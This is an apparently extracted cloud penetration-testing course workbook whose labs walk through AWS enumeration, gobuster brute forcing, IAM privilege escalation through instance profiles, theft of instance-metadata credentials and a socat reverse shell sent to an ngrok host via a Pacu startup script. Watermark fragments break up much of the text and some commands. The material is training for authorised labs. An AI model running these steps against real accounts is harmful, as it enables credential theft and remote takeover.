aws ec2 describe-instances --profile lab22 | jq '.Reservations[].Instances[] | "\(.InstanceId)

:
To
\(.PublicIpAddress)"'
d
n se
ce
Li
live You now see the

power of the tool as it outputs both Instance Id and Ip Address on the same line. Now we need to gure out each
Instances Security Group:
aws ec2 describe-instances --profile lab22 | jq '.Reservations[].Instances[] | "\(.InstanceId)

\(.PublicIpAddress) \(.NetworkInterfaces[].Groups[].GroupId)"'

Now we have a new problem which is each Security Group has a port list somewhere else, there is no simple
way to do this as we need to invoke a di erent API call to gather this data. Below is an example of a way to print
out the Security Group name and the Ports that belong to each for manual veri cation:
3e1e3b497543e6c11ac8e4188959c93e
for SG in àws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] |
.NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; done
20
This command prints it out, let's append each one of the commands to the end of describe-security-group
20
method:
,
28
for SG in àws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] |
ly
Ju
.NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; aws ec2 describe-
security-groups --profile lab22 --group-ids $SG | jq ' .SecurityGroups[] | .IpPermissions[] |
>
om
.ToPort'; echo "===="; done
_c
ok
23169600 @
ou
tlo
66
s1
ne
Replay of this lab

ljo
Gregg Harris
au

<p
s
rri
Now that we understand what we can do with the AWS CLI, let's use the CLI toolkit's power to start exploring the
Ha
infrastructure permissions of the system. AWS has a very powerful permissions model, but with it's age it has
gg
many challenges to overcome.

re
G
1. It has some complexity issues in it's power

:
To
2. It can be miscon gured

d
3. Exposing Keys, or Tokens may lead us to getting further into an environment.

n se
ce
We will be using the foundations of this lab in a further exercise.

Li
Additional Resources live

SANS SEC540: Cloud Security and DevOps Automation (https://www.sans.org/sec540)

Lab 2.3: Wordlists to nd
3e1e3b497543e6c11ac8e4188959c93e
Endpoints and Resources
20
Brief Intro
, 20
28
This lab introduces you to the usefulness of extremely large and relevant wordlists.
ly
Ju
>
The wordlists used in this lab have been created using a speci c set of queries against publicly available datasets
om
at google.
_c
ok
you can and you will need:
23169600 @
ou
tlo
The author of this course has decided not to have the students RUN the commands instead, he just shown you
the commands below which had been used ot create the wordlists in this class. If you wish to do this after class
66
s1
1. A Google Cloud Account

ne
2. About $20 - $25 to run the queries in the Big Table database
ljo
Gregg Harris
au
./commonspeak2 --project sec588 --credentials

<p
~/.config/gcloud/application_default_credentials.json routes --frameworks rails -l 100000 -o

s
rails-routes.txt
rri
Ha
./commonspeak2 --project sec588 --credentials

gg
~/.config/gcloud/application_default_credentials.json subdomains
re
G
The wordlist outputs are all located in

:
/home/sec588/files/wordlists
To
d
se
What does the rst command do? It leverages a public set of data sets 43
n
ce
During this lab you will nd and uncover new applications, hosts and resources that will be used throughout the
Li
live
labs today. Similar to the rst day, this will be a cloud based treasure hunt. Your goal will be to nd the
applications that allow us to:
1. Post text
2. Post a comment to that text
3. Any additional resources that are related

The wordlists themsevles are fairly length and are fairly long to scan for. Instead what we are going to do, is we
have already trimmed the wordlists for you. The wordlists trimmed like so:
3e1e3b497543e6c11ac8e4188959c93e
$ head -10000 subdomains.txt > subdomains-10k.txt
$ head -5000 rails-routes.txt > rails-routes-5k.txt
20
We will only be using the -5k.txt and -10k based wordlists.
, 20
28
ly
Ju
In this lab we will be requiring connectivity to our lab environment.
>
om
_c
Try It Yourself
ok
23169600 tlo
To attempt this lab yourself you will need a few bits of information:
@
ou
1. Find the blog site using
66
/opt/gobuster
2. The gobuster command for nding the hosts will be dns , the wordlist for this is going to be the wordlist
s1
called subdomains-10k.txt in the directory

ne
files/wordlists
3. Find the hidden api url's in the blog site using the /opt/gobuster , you will need to use the option.
ljo
dir
4. The wordlist for this is in the
Gregg Harris in the directory
au
rails-routes-5k.txt files/wordlists
5. The command line options that are needed is to use the at 100, run the system in
<p
threads quiet
mode
s
rri
6. Once you have located the blog, attempt to delete a post, you will not be able to, try and delete it by using
Ha
hidden API functionality.

gg
re
Walkthrough
: G
To
Getting started
d
se
We are going to be using gobuster to work through this our wordlist in a very quick and e cient way.
n
ce
Commonspeak2 wordlists can be in the 1M+ range, but working through a 1M+ wordlist would be a very
Li
timeconsuming task. We will begin with our reduced wordlists.
live
We will start by open a MATE terminal if one is not already opened:

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
To begin let's take a quick tour of our rst two wordlists:

ljo
Gregg Harris
au
<p
cd /home/sec588/files/wordlists
s
rri
If you we list out the directory ls we should see several les with their corresponding 'commonspeak2'
Ha
category:
gg
re
rails-routes , subdomains , and scm
: G
To
Let's look at the di erences between subdomains and rails-routes

d
nse
$ cat subdomains-10k.txt | less

ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
To exit the less command use the letter q to quit

ne
ljo
What we see when we cat this out is a list, but a list of what? This happens to be a list of all of the 'common'
Gregg Harris
au
subdomains that have been found by order of likelyhood inside of speci c respositories like hackernews and
<p
stackover ow, on the internet.

s
rri
These subdomains are the basis of the entire host of potentially. What gobuster can do is start with a base
Ha
domain like:
gg
re
sec588.net
: G
To
And prepend each subdomain:

d
n se
www.sec588.net
ce
Li
blog.sec588.net
live
Go through the wordlist looking for 'valid' 200 OK messages. Gobuster is a rather 'dumb' tool however, it will just
look for valid 200 OK messages, it can follow redirects, but it will also detect '404's as valid at times.
Now, let's look at the other wordlist:

$ cat rails-routes-5k.txt | less
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
This particular wordlist has a di erent feel. All of the words on here look like the end's of URI's. The reason for
23169600
Ruby on Rails set of applications in which the rails routes
tlo
this is because this particular wordlist comes from github entries. They are actually based on repositories for the
ou
routes.rb
@
le is looked at. The particular interest in
this le are uri's that have been removed from routes.rb, which could be done for many valid reasons. The hope
66
was to:
s1
ne
1. Get a list of URI's to append to

ljo
2. Get a list of URI's that may have security issues that a developer may have needed to remove from public
Gregg Harris
au
exposure.
<p
s
Now that we have a baseline for a set of word lists let's play with them to discover good a known pages.
rri
Ha
Discovering hosts through subdomains

gg
re
Gobuster has a set of tools to discover three individual items.
: G
To
dns , vhosts , and dir

d
se
These would roughly map to:

n
ce
Li
dns would use the subdomains le and

live
dir could use our routes le.
Let's look at some of the options for gobuster by going into the gobuster subdirectory and running the
executable:
$ cd /opt/gobuster

$ ./gobuster
You shoud see a help menu and some global options:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Let's explore a few of these, rst we will be working with the gobuster dns options to nd new hosts for us to
s1
attack:
ne
ljo
Gregg Harris
au
.sec588.net
-w : we can use the wordlist setting to specify our wordlist.

The rst command we will run will be the following:
$ /opt/gobuster/gobuster dns -d <class-subdomain>.sec588.net -w
3e1e3b497543e6c11ac8e4188959c93e
You will see output similar to whats below:
20
, 20
28
ly
Ju
>
om
_c
ok
23169600
We have found a few hosts that could be interesting:
@
ou
tlo
66
www
s1
ne
ljo
blog
Gregg Harris
au
<p
dev
s
rri
Ha
wiki
gg
railsapi
re
G
Let's Explore some of these in more detail. Do any of them have interesting directories?
:
To
d
se
Subdomain and Directory enumeration

n
ce
Gobuster has a directory brute forcing capability that is rather primitive but e ective. Let's start with appending
Li
a rails route to the end of some of hosts. We will start with blog as it is the rst entry in our list:
$ cd /opt/gobuster
live
$ ./gobuster help dir

We see some options that could be useful:
-u : This will be our url string, so for the blog.<class-subdomain>.sec588.net this will be our
3e1e3b497543e6c11ac8e4188959c93e
url for our lab.
-a : This is the user-agent string that is sent, our Slingshot build for SEC588 has a very speci c UserAgent
string in the environment variables. To see it type:
20
20
-t : This is the to up the number of threads, we will use 100
,
28
-q : There will many errors, this surpress those errors.
ly
Ju
>
env | grep UA and you will see that the $UA variable is set to Chrome 74
om
_c
Our command:
ok
23169600 ou
$ /opt/gobuster/gobuster dir -u blog.<class-subdomain>.sec588.net -w
/home/sec588/files/wordlists/rails-routes-5k.txt -a $UA -q -t 100
@
tlo
66
s1
ne
ljo
Gregg Harris
au
.sec588.net .
re
:G
To
d
n se
ce
Li
live
This particular site appears to be able to Create a New Post .

3e1e3b497543e6c11ac8e4188959c93e
20
20
As a user you can create a post. You should go ahead and enter one in. Here is *AS AN EXAMPLE The author is
,
using the following one:
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au

om
_c
Notice however that every URL post has a #, in our EXAMPLE we are using:
ok
/posts/7 23169600 ou
@
tlo
66
Record your posts number because we will need this later, and we will use it for our lab in the next section.
s1
ne
ljo
Once you have created a comment you may notice that comments can be deleted:
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
We cannot delete a post however can we?

n se
ce
Looking at our URLs

Li
live
Please Note that this API is a Development API and the functionality of the API is not yet fully enabled. Using the
'Execute' function of this API will not yield you any results.
Look above at the output of gobuster, you probably saw many di erent url's potentially, but one in particular
may have stood out.

/api
Let's take a look at /api closely, when you open it you may notice that is a Swagger API:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
The Swagger UI has two options that seem to be able to be used one is the method, another method is
_c
GET
the method. This one may be one that we may want to explore.
ok
DELETE
The DELETE 23169600

method takes one parameter which is the
area you will see how you can use this API. Click the
ou
{id}
@
Try it outtlo
parameter. If you expand the DELETE
button and you will be able to see how to
66
use the function and even execute a real command.

s1
ne
This will DELETE your post, but it could also delete any posts on the system so be kind to your neighbors.
ljo
Gregg Harris
au
Your author as an example will DELETE the {id} of 7 , you will may or may not have a di erent
<p
number.
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live
Do not use the Execute Command to execute the request, it will not work Use the curl below!

Copy the curl command to your local computer and replace the {id} with your blog post id .
curl -X DELETE "http://blog.<class-subdomain>.sec588.net/api/v1/posts/{id}" -H "accept: */*"
3e1e3b497543e6c11ac8e4188959c93e
Conclusion
In this lab we covered how to use a large wordlist to comb through an environment and uncovered not just
20
potentially hidden and not necessarily known servers but also hidden endpoints and potentially hidden
20
functionality. We looked at how the functionality of one system coud be changed by just uncovering an api
section.
,
28
ly
In the wild we may nd that the full functionality and security of a system is bypassed by using hidden API's,
Ju
hidden administrative consoles, or just by attempting to access sections of an applicaion that are not meant to
>
om
be accessed.
_c
ok
23169600 ou
tlo
All too often we see websites that have multiple avenues for testing but are missed. As penetration testers we
@
should be looking for all of the avenue's that we may nd on a system, whether they are full documented or not.
66
It just so happens that /api was a fully documented API but not every single one will be. Don't be afraid to try
s1
multiple methods and multiple ways to attempt to nd more undocumented API's.

ne
ljo
Gregg Harris
au
<p
s
There is a hidden ruby console that is available on the system. See if you can trigger the console by nding a
rri
broken page or creating some kind of error on the system. If you nd the console, see if you can execute ruby
Ha
scripts or even commands on the host.

gg
re
: G
To

d
n se
ce
Li
live

Lab 2.4: Privilege
3e1e3b497543e6c11ac8e4188959c93e
Escalations through IAM -
Part 1
20
, 20
28
Brief Intro
ly
Ju
>
AWS IAM can be very complex with many options to con gure permissions and various di erently places. While
om
that complexity can be managed through advisory type software, most often permissions are set very loosely.
_c
This lab will walk you through leveraging keys and elevating priviledges to be able to eventually obtain access to
ok
data.
23169600 ou
tlo
There are a few IAM mechanisms that we will explore including, looking at versioning and looking at using ec2.
@
66
A diagram of what we are going to attempt in this lab is found below.

s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

This lab would require you have completed all of the Day1 exercises, however we will be reviewing many of the
topics in the prerequisite sections. This lab does require connectivity to our AWS Environment.
3e1e3b497543e6c11ac8e4188959c93e
It will also require that we have our AWS tools in our vm installed, you can check this by typing the following
commands in the cli and looking for the aws help message:
$ aws
20
20
Try It Yourself
,
28
ly
1. Review your policy set
Ju
2. Find an EC2 Instance Pro le that you can leverage
>
3. Run an EC2 instance that contains your user private key to login
om
_c
Walkthrough
ok
Getting started
23169600 @
ou
tlo
66
We will begin our lab, where left our previous labs, in Lab 2.1 we leveraged an AWS CLI token and now we wish to
s1
get further access. Open a MATE Terminal:

ne
ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
The rst item that we will wish to review is the ability for us to see the secret data:
ljo
Gregg Harris
au
<p
$ cat /home/sec588/files/workdir/secretdata.txt
s
rri
Ha
gg
re
G
This le appears to
:
To
be base64 encoded, we can tell by the format the encoding uses only the following characters: a-z,A-Z,0-9,+,/.
d
We also can tell by the fact that there is padding of = used. Let's run this through the base64 decoder in our
se
system to see if this is text or something else:

n
ce
Li
live
$ base64 -d /home/sec588/files/workdir/secretdata.txt
The le will print garbage instead of text. This is indicative that there is something special about this le. Maybe
this le is encrypted? Amazon does provide a Key Management Service to help protect data. Let's attempt to use
it:

$ aws kms list-keys --profile lab22
We can see that we are unable to leverage the system by getting an error:
3e1e3b497543e6c11ac8e4188959c93e
(AccessDeniedException)
20
20
,
28
ly
Ju
>
om
Finding a way to escalate privileges
_c
ok
What privileges do we have? IAM can be complicated, the user can have policies directly attached to them and
23169600
they can also have policies that not attached but speci ed. @
ou
tlo
Listing out Bob's policies:
66
s1
ne
Note if you are not sure of bob's username you can always look it up:
ljo
Gregg Harris
This command will allow us to get Bob's actual username:
au
<p

s
rri
Ha
| get-user: will get the user name for the current session you are in.
gg
re
Armed with Bob's username we can now see bob's policies:

: G
To
$ aws iam list-user-policies --profile lab22 --user-name bob-<class-subdomain>

d
se
It would appear Bob has no direct policies. Let's see if he has any policy attachments:
n
ce
Li
live
$ aws iam list-attached-user-policies --profile lab22 --user-name bob-<class-subdomain>
REMEMBER: A user can have direct policies, but they can also have attached policies and either one can provide
additional rights and permissions.

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
Bob has one attached policy. Copy the ARN from the previous command. Let's now look at his policy:
om
_c
Attempt to run this command:
ok
v1
23169600 @
ou
tlo
$ aws iam get-policy-version --profile lab22 --policy-arn <from previous command> --version-id
66
If the command shows you that it does not work for example:
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
Try additional versions v2 , v3 ... In our labs we had up to v6 .
: G
To
A user can have up to 5 policies, no more. Look at all the policies, do any othem re ect KMS?
d
nse
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
We can however look at other services that we have access to. We have a few options available to us, we have
EC2 , and we have the PassRole
23169600 tlo
option avaiable to use as well.
@
ou
Reviewing EC2 Instances
66
s1
EC2 systems can have their own policy permissions. This is done so that EC2 instances can then talk to other
ne
AWS Services. Given a limited set of privileges we have, let's explore what Role Assignments may be in use by
ljo
starting with looking at the ec2 instances:
Gregg Harris
au
<p
$ aws ec2 describe-instances --profile lab22 --query 'Reservations[].Instances[]' | jq '.[] |

s
"\(.InstanceId) || \(.IamInstanceProfile.Arn)"'
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live
We now see that we have several instances with several IamInstancePro les attached. Did you heppen to notice
an instance with the name KMS in it?
arn:aws:iam::<numbers>:instance-profile/ec2-kms-<class-subdomain>

Let's record some values from the instance Id which we believe has this particualr ARN, Count the row in which
the KMS ARN shows up. Then count the same number in the rst command to get the InstanceId:
3e1e3b497543e6c11ac8e4188959c93e
$ aws ec2 describe-instances --instance-id <id from> --profile lab22 --output table
20
, 20
28
ly
Ju
>
om
_c
ok
Let's grab the following items:
23169600 @
ou
tlo
66
Under Network Interfaces record the: SubnetId

s1
ne
ljo
Under Security Group grab the: GroupId
Gregg Harris
au
<p
s
rri
Ha
gg
re
Record these two items that we will need to use to create our OWN ec2 instance We will use this in an exercise
G
coming up.
:
To
d
se
We have an ec2 Instance that potentially is running with a permission set that could provide use with the right
n
permissions between to do sometype of action with KMS. While the name KMS appears in the name, there is no
ce
other real way with the permissions we have to determine what this role can do. What we can do is attach this
Li
PassRole EC2 live

role to an instance we control that will allow us to attempt to execute KMS level functions. Since we have the
and several instance permissions, we can attempt to launch an EC2 instance which we can
then SSH in and read the instance metadata service token. We can use this AMI below of an Ubuntu 18.04 image
to attach to:
"Resource": "arn:aws:ec2:*::image/ami-00a208c7cdba991ea"

What we will be doing here is creating an EC2 instance that we can then SSH into. Let's create an SSH key rst:
Your instructor will provide you a number, replace X with that number.
3e1e3b497543e6c11ac8e4188959c93e
For vLive, Simulcast, and OnDemand Students we recommend that you create a Key based on the following
variables 1XXXX where XXX is the last octect of your computer's IP address on the internet. You can use
www.ipchicken.com (http://www.ipchicken.com) to nd out your IP address For individuals with IP addresses below
20
100 you can use 0's for example for an address that end in 88 you can use 1088 as your student number.
, 20
28
$ aws ec2 create-key-pair --profile lab22 --key-name studentX-<class-subdomain> --query
ly
'KeyMaterial' --output text > /home/sec588/files/workdir/studentX-<class-subdomain>.pem Now
Ju
with that key we can use the values recorded above to launch an ec2 instance:
>
om
$ aws ec2 run-instances --profile lab22 --image-id ami-00a208c7cdba991ea --iam-instance-
_c
profile Arn=<Arn from the ec2-kms-class-subdomain> --key-name studentX-<class-subdomain> --
ok
23169600
subnet-id <subnetId> --security-group-ids <GroupId> --output table
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
This process may take up to 5 minutes. RECORD THE INSTANCE ID
: G
To
Note the instance Id in the output, once the system is launched you will be able to SSH to it via its public IP
d
se
address. IMPORTANT: We will also be using the InstanceId in future labs!

n
ce
Li
$ aws ec2 describe-instances --instance-id <InstanceId> --profile lab22 --output table
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
Scroll through and look for a public IP Address.
23169600 ou
tlo
$ chmod 4600 /home/sec588/files/workdir/student1-<class-subdomain>.pem
@
66
$ ssh -i /home/sec588/files/workdir/student1-<class-subdomain>.pem ubuntu@<PublicIpAddress>

s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G:
To
d
nse
ce
Li
live
Please note the following pieces of data to used later:
1. Your Instance ID.

2. Your Instanace IP Address

Now that this instance is running, we will be stopping this exercise and continuing it in the next lab

3e1e3b497543e6c11ac8e4188959c93e
There are many ways to perform privilege escalations in IAM. Some of the ways involve leverage versioning of
the users pro le, other times it will be to take key material for services. The services include items like EC2
tokens and Lambda tokens!
20
20
This lab has shown us that while we may not think that a permission is harmless, a skilled attacker could take a
,
seemingly restrictive permission and abuse it to accomodate what they are after. We will also see how this
28
permission set can be abused further.
ly
Ju
>
om
_c
SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au

Throughout this course you will be interacting with many of Amazon Web Services API's. We discovered an AWS
om
Key string potentially in our Day 1 Lab 4 exersize. Let's see if we can actually attempt to use those particular
_c
keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can help us get further into
ok
the environment.
23169600 ou
tlo
A diagram of what we are going to attempt in this lab is found below.
@
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live
This lab requies the student to have:

Finished Lab 2.4
Have an EC2 Instance Running
Are able to SSH into that instance using their private key.
3e1e3b497543e6c11ac8e4188959c93e
Try It Yourself
If you wish to try this on your own:
20
20
1. Copy the AWS EC2 Service Token by leveraging the AWS IAM Metadata Key
,
28
2. The Metadata token will allow you to list out KMS keys
3. Decrypt the secretdata.txt le by leveraging KMS to perform the operation on your behalf
ly
Ju
4. List out AWS Lambda Functions
5. Execute the function called 'lambda-<class_subdomain>'
>
om
6. Find the secrets in each case.
_c
ok
Walkthrough
Getting started
23169600 @
ou
tlo
66
This lab should pick us up where we left o . We should be able to have SSH access to our environment:
s1
ne
ljo
$ ssh -i /home/sec588/files/workdir/studentX-<class-subdomain>.pem ubuntu@<PublicIpAddress>
Gregg Harris
au
<p
From this machine we have full root permissions, this can be found by running a few root commands:
s
rri
Ha
$ sudo ls /root
gg
There will be no password set for sudo on this device. This device can also laterally move around the
re
environment as it is in a VPC that is adjacent to other nodes, open a new MATE window and let's look for an ip
G
address that is considered private:

:
To
d
se
$ aws ec2 describe-instances --profile lab22 | jq '.Reservations[].Instances[] | "\

n
(.InstanceId) \(.PrivateIpAddress)"'
ce
Li
live
None of the instances may allow 'ping' however if you attempt ssh to one of them you will get a login prompt or
SSH Key accept prompt. These instances while potentially not available to the public, are internal, and may allow
for lateral movements.
$ ssh 10.10.10.X

There may also be databases and other services not externally available but internally available.
Getting a Service Token and using our new Identity
3e1e3b497543e6c11ac8e4188959c93e
Let's however try and obtain the keys to elevate our privileges, from the EC2 instance we are in:
$curl http://169.254.169.254/latest/meta-data/iam/security-credentials
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
The output will not look very well formed it may show up like this:
s1
ne
ljo
ec2-kms-role-<class-subdomain>ubuntu@<ip>
Gregg Harris
au
; printf "\n"

gg
re
The output will re ect as follows:
: G
To
d
n se
ce
Li
live

{
3e1e3b497543e6c11ac8e4188959c93e
"Code" : "Success",
"LastUpdated : "<Time>",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIXXXXXXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXX",
20
"Token" : "XXXXXXXXXXXXXXXXXXXX/////////XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
20
"Expiration" : <Time>
}
,
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Elevation of access to decrypt the KMS data

s1
Now that we have a Valid Token with Access Key ID we can go ahead and move those into the appropriate
ne
locations, open a new terminal window. By performing these commands we are now going to be the logging into
ljo
Gregg Harris
EC2 as this new user. From that window open your favorite text editor and edit
au
/home/sec588/.aws/credentials

Li
aws_secret_access_key = <SecretAccessKey> live

aws_session_token = <Token>

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
Then open the le with your favorite editor and add the following sections at the
28
/home/sec588/.aws/config
end:
ly
Ju
[profile lab25]
>
om
_c
region = us-east-1
ok
23169600 tlo
With our new token, let's see if we can now 'solve our previous challenge'. Can we list KMS Keys?
@
ou
aws kms list-keys --profile lab25
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
:
To
d
n se
To see if the decrypt is possible we can ask the KMS to use its own knowledge of available keys to perform
ce
decrypt operations:
Li
live
aws kms decrypt --profile lab25 --ciphertext-blob fileb://<(cat
/home/sec588/files/workdir/secretdata.txt | base64 -d) --output text --query Plaintext | base64
-d > unsecretdata.txt
You should now be able to run cat unsecretdata.txt and it would reveal our 'secret data!'

3e1e3b497543e6c11ac8e4188959c93e
Additional Privileges with Lambda!
This particular pro le role lambda privileges. We can uncover this by just attempting to try the following:
20
20
aws lambda list-functions --profile lab25
,
28
You could see a Lambda Function called:
ly
Ju
>
lambda-<class-subdomain>
om
_c
Lambda Let's execute this function and see if it will work with an empty payload:
ok
23169600 ou
tlo
aws lambda invoke --function-name lambda-<class-subdomain> --profile lab25 ./lambda-out.txt
@
66
If this is successful you would see the following command work:

s1
ne
cat ./lambda-out.txt
ljo
Gregg Harris
au
<p
s
rri
Ha
What permissions are needed to perform these actions

gg
re
The following permissions allowed us to perform these actions:
:G
To
d
nse
"lambda:ListFunctions",
ce
()
"lambda:InvokeFunction", ()
Li
"lambda:InvokeAsync" ()
live
For the KMS we just need decrypt and list permissions:

"kms:EnableKey", ()
3e1e3b497543e6c11ac8e4188959c93e
"kms:Decrypt", ()
"kms:ListKeyPolicies",
"kms:ListRetirableGrants",
()
()
"kms:ListGrants", ()
"kms:ListKeys", ()
20
"kms:Encrypt", ()
20
"kms:ListAliases", ()
"kms:CreateKey"
,
()
28
ly
Ju
>
om
Without that many rights we can perform alot of damage, so we should be cautious and careful with these keys
and permissions.
_c
ok
23169600 @
ou
tlo
In the last 2 labs we have gone from a non-priviledged, or less than privileged AWS user to a user that has the
66
capability to perform additional functions. By performing these operations we should be able to gain more
s1
access to the AWS environments and we can show the criticality of why these keys need to be protected.
ne
ljo
Additional Resources Gregg Harris

au
<p
s
We always recommend learning how to harden your environments, and as such we recommend our Secure
rri
DevOps and Cloud Automation course to help you on this journey:

Ha
gg

re
:G
To
d
nse
ce
Li
live

Lab 2.6: Rhino Security's
3e1e3b497543e6c11ac8e4188959c93e
Pacu
20
Brief Intro
, 20
28
Pacu is a tool that will allow us to automate the enumeration, exploitation and discovery of services in Amazon
ly
Web Services (AWS). Much of the previous labs can be automated using the PACU tool. While the tool is not
Ju
without it's small limitations, however the tool does provide automation in many of the manual work ows we
>
have done. Leveraging the PACU tool we can weaponize keys that we have found.
om
_c
ok
23169600 @
ou
tlo
66
s1
Finished Labs 2.4 and 2.5, have a set of API keys that are current in time, and can validate that the commands
ne
for lab25 are still working

ljo
Gregg Harris
au
Try It Yourself
<p
s
rri

Ha
gg
1. Run PACU and create a new session

re
2. Import all of your keys
G
3. Enumerate your iam permissions

:
To
4. Replicate the passing of a new instance pro le like Lab 2.5

d
5. Enumerate Lambda functions

se
6. List out the data for each of these commands, speci cally lambda
n
ce
The command would be data Lambda

Li
Walkthrough live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne

ljo
Gregg Harris
au
<p
cd /opt/pacu
s
rri
To ensure that we do not have data that is corrupt we will type the following commands:
Ha
gg
rm sqlite.db
re
G
rm -Rf sessions
:
To
d
se
mkdir sessions
n
ce
To run pacu type the following commands:

Li
python3 pacu.py live

This will create new Database, the rst question you will get is to provide the session with a name. The name we
will give it is lab26

Name this session? lab26
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Importing the Keys

ne
Pacu allows you to get access to existing credentials to do this we can run a few commands:
ljo
Gregg Harris
au
import_keys --all
s
rri
This command will import the two keys you have in your existing aws credentials le. Let's swap to Lab22
Ha
gg
>swap_keys
re
G
Choose lab22 by typnig the number 1

:
To
d
se
Let's see how we can run some commands. First let's set our region, but what region will we use? We are
currenting in unless your instructor has told you otherwise. The command will show
n
us-east-1 regions
ce
you all regions

Li
>regions live
To set this to region to us-east-1 , this will tune our scans to just the single region instead of all regions and
make our labs faster

>set_regions us-east-1
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
ls
d
nse
We can see a fairly large number of modules. Let's look at the module.
ce
iam__enum_permissions
Li
>help iam__enum_permissions
live
We now see a few options that allow us to target speci c users or roles. For now, let's just run the module as is.
>run iam__enum_permissions

It runs, and provides us with data, but where is the data? This module only con rms that you have permissions
>run iam__enum_users_roles_policies_groups
3e1e3b497543e6c11ac8e4188959c93e
This module leverages the IAM Enum permissions to give us all the data, however it is not able to display it all on
the screen.
20
>data
, 20
28
One more item, let's replicate one of our earlier labs, can we replicate a version change automatically?
ly
Ju
> run iam__privesc_scan
>
om
We can actually do this, this tool will help us run the aws command to replace our access using the right
_c
privileges
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au

d
se
Do you recall seeing this from Lab 2.5? It is because we actually have this instance pro le mapped to us.
n
ce
Li
Now Let's choose 4 , let's attempt to use the SSH Create an EC2 function to get the credentials. This will
live
create the EC2 Instance, it will give you the IP address of the request, it will also print out the private key. All of
this has to be put together in one piece to be able to get the same result as Lab 2.5.

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Lambda listings
s1
ne
Next let's see if we can enumerate Lambda functions?

ljo
Gregg Harris
au
run lambda__enum
s
rri
This will fail

Ha
This will fail, we do not have rights. We did however have a user that had the appropriate rights, let's see how we
gg
can change to a valid user.

re
:G
swap_keys
To
d
se
Choose option 2 which is lab25

n
ce
Li
run lambda__enum
live
We now have enumerated Lambdas, to see this let's type data but this time we will specify the service.
data Lambda
The L in Lambda has to be uppercase

There are many other options in PACU as you can see,
If you have additional time

3e1e3b497543e6c11ac8e4188959c93e
Getting a Proxy Client to be staged
If you have time there are speci c commands that allow you to run a proxy client, the proxy can provide a
20
reverse shell back to your system. To use the proxy client you will need a few things:
20
,
28
1. A registered nGrok account, it can be a free account, make you have completed this from yesterday's lab.
2. Open terminal 1, start ngrok by using the following command:
ly
Ju
>
om
_c
ngrok tcp 9998 ()
ok
23169600 @
ou
tlo
3. Open terminal 2, start a socat listener on a DIFFERENT SHELL:
66
s1
ne
ljo
Gregg Harris
au
socat file:`tty`,raw,echo=0 tcp-listen:9998,fork,reuseaddr ()

<p
s
rri
Ha
5. Open terminal 3, you may have to get the ngrok TCP/IP address for socat.
gg
re
nslookup X.tcp.ngrok.io
G
Record this value as ngrok ip .

:
To
NOTE: X will be a number, and it can change! Because you may have DNS Resolution issues you may
d
need to use the IP not the DNS Name.

n se
ce
6. Build a script like so:

Li
live

#!/bin/bash ()
3e1e3b497543e6c11ac8e4188959c93e
sudo apt update ()
sudo apt install socat -y ()
socat tcp-connect:<ngrok ip>:<ngrok port> exec:/bin/sh,pty,stderr,setsid,sigint,sane ()
20
20
7. Save the script le as script.txt, this is all done from the: /home/sec588/files/workdir .
,
28
ly
8. Make sure PACU is running, run the following command: Remember that Lab22 is the user with rights you
Ju
may need to swap_keys .
>
om
_c
run ec2__startup_shell_script --instance-ids <instance id from lab 2.4 and 2.5>@us-east-1 -
ok
-script /home/sec588/files/workdir/script.txt
23169600 ou
tlo
9. The shell will take up to 5 minutes to be found because the system needs to be shutdown / boot.
@
66
Conclusion
s1
ne
Throughout this lab, we walked through what it would take to automate an attack on AWS with proper toolling.
ljo
Gregg Harris
